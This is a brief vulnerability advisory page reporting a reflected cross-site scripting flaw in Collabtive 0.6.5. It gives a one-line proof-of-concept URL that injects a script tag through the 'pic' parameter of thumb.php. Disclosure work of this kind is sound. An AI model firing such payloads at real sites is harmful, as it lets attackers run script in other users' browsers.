Home
Consulting
Advisories
Software
Articles
Contact

Collabtive 0.6.5 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Collabtive 0.6.5 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/collabtive065/thumb.php?pic=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC